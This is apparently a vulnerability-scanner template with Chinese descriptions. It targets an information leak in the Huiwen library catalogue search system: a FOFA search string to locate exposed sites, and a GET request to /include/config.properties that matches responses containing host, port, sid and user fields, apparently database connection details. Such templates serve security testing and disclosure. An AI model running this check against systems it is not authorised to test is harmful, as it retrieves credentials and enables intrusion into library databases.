漏洞描述
汇文 图书馆书目检索系统 /include/config.properties 文件中包含敏感信息,攻击者可以直接访问获取信息
fofa: app="汇文软件-书目检索系统"
id: huiwen-book-config-properties-info-leak
info:
name: 汇文 图书馆书目检索系统 config.properties 信息泄漏漏洞
author: zan8in
severity: high
description: |-
汇文 图书馆书目检索系统 /include/config.properties 文件中包含敏感信息,攻击者可以直接访问获取信息
fofa: app="汇文软件-书目检索系统"
tags: huiwen,book,config-properties,info-leak
created: 2025/08/20
rules:
r0:
request:
method: GET
path: /include/config.properties
expression: response.status == 200 && response.body.bcontains(b'host') && response.body.bcontains(b'port=') && response.body.bcontains(b'sid=') && response.body.bcontains(b'user=')
expression: r0()